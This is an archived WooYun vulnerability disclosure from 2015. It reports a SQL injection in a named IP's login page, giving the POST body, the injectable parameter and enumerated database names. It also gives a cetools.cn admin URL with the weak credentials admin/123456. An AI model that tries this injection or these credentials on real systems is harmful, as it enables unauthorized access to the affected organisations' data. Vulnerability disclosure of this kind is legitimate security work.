WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
Disclosure timeline:
- 2015-11-20: Details sent to the vendor, awaiting vendor handling
- 2015-11-20: Vendor confirmed; details disclosed to the vendor only
- 2015-11-30: Details disclosed to core white hats and domain experts
- 2015-12-10: Details disclosed to regular white hats
- 2015-12-20: Details disclosed to intern white hats
- 2016-01-11: Details disclosed to the public

Submitted: 2015-11-20
1. SQL injection: http://121.14.6.93:8001/login.asp, POST body: Submit=%b5%c7%c2%bd&pass=1111&usr=1, injectable parameter: usr
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008

available databases [8]:
[*] CE_Portal
[*] domainlogin1_22
[*] master
[*] MIS_Release
[*] MIS_Release1
[*] model
[*] msdb
[*] tempdb
Database: domainlogin1_22 [154 tables]
2. Weak password on the back-end admin system: http://www.cetools.cn, admin URL: http://www.cetools.cn/index.php/cetools_admin/index, credentials admin / 123456

Fix recommendation: 1. Filter the input. 2. Change the password.
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-11-20 22:10
Being processed.
None yet